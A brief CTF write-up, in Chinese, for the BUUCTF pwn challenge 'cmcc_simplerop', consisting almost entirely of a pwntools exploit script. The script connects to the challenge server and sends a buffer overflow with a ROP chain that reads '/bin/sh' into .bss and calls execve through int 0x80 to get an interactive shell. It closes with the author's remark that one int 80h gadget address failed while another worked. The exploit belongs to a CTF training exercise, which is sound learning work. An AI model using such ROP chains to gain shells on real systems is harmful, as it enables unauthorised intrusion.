cmcc_simplerop

静态的文件，应该是rop 然后系统调用

from pwn import*
context.log_level = 'debug'
io = remote("node4.buuoj.cn",26958)
#io = process('./simplerop')
elf = ELF('./simplerop')
#gdb.attach(io)
pop_eax = 0x080bae06
pop_edx_ecx_ebx = 0x0806e850
int_80 = 0x0806EEF0
sh_addr =0x080be238
bss_addr=0x080EAF86
payload = b'a'*0x20+p32(pop_eax)+p32(0x3)+p32(pop_edx_ecx_ebx)+p32(0x8)+p32(bss_addr)+p32(0)+p32(int_80)
payload += p32(pop_eax)+p32(11)+p32(pop_edx_ecx_ebx)+p32(0)+p32(0)+p32(bss_addr)+p32(int_80)
io.send(payload)
io.sendline('/bin/sh\x00')
#pause()
io.interactive()

int 80h = 0x080493e1这个中断好像不行，不知道为什么
我换了个地址的就打通了 有点莫名其妙了